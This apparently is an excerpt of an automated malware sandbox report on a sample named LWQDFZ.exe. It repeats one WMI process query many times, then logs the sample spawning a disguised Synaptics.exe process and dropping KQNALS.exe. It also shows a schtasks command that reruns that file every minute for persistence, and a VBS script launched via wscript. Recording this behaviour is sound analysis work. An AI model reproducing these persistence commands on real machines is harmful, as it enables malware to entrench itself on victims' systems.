                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Users\user\Desktop\LWQDFZ.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\LWQDFZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: LWQDFZ.exe ReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\LWQDFZ.exe File read: C:\Users\user\Desktop\LWQDFZ.exe
                              Source: unknown Process created: C:\Users\user\Desktop\LWQDFZ.exe "C:\Users\user\Desktop\LWQDFZ.exe"
                              Source: C:\Users\user\Desktop\LWQDFZ.exe Process created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe"
                              Source: C:\Users\user\Desktop\LWQDFZ.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: MHDFGY.lnk.2.drLNK file: ..\..\..\..\..\Windata\KQNALS.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\gbvaaeG.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
